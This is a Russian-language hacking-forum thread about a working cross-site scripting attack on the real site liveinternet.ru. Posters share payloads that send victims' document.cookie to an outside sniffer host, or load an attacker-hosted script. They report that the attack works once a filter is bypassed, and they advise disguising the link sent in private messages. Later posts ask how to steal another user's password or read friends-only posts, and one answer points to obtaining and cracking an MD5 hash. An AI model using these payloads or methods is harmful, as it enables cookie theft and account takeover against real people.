найдено D=P=CH= MOD= http://www.liveinternet.ru/add Вводим "><script>alert("xss")</script> алерт работает! Но КУКИ не приходят!!!! Хотя ввожу в поле "Ключевые слова" все верно: "<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;"> либо "<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> и даже этим способом: "<srcipt src=http://мой_сайт.ru/js.js></script> Пробую "регить сайт", заходя со своего акка. Не приходят, мать их!!! Не понимаю, в чем дело? Подскажите!
проверь хтмл код когда вставил снифер.. у меня document.cookie обрезал движок сайта... если ничо не путаю.. давно это было
ОК Все работает. Просто пытаются фильтровать "=" Ссылку советую маскировать во избежание доп. фильтрации в приватных сообщениях. Вариант со скриптом на собственном хосте прекрасно прокатывает. Тема исчерпана.
А можно ли как-нибудь на liveintrnet добыть чужой пароль или хотябы читать "закрытые" сообщения (т.е. те которые только для друзей)??? Если да, то как. Очень надо. Заранее спасибо.
http://forum.antichat.ru/thread29020.html получишь хеш пароля в md5(вроде бы) потом расшифруешь пароль и зайдешь...
